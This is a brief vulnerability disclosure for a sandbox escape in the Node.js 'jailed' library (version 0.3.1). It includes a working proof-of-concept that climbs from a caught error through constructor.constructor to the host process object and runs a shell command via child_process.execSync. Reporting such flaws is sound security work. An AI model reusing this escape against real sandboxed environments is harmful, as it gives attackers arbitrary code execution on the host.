Sandbox Escape Bug in jailed with Node.js

[seongil-wi]

• Jailed version: 0.3.1

• Node version: 18.15.0

• run-jailed.js

var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);

• test_case.js

try {
    __defineGetter__("x", )
} catch (pp) { 
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
}
application.disconnect();

Sandbox can be escaped by calling __defineGetter__ or __defineSetter__.
Also, we can execute arbitrary shell code using process module.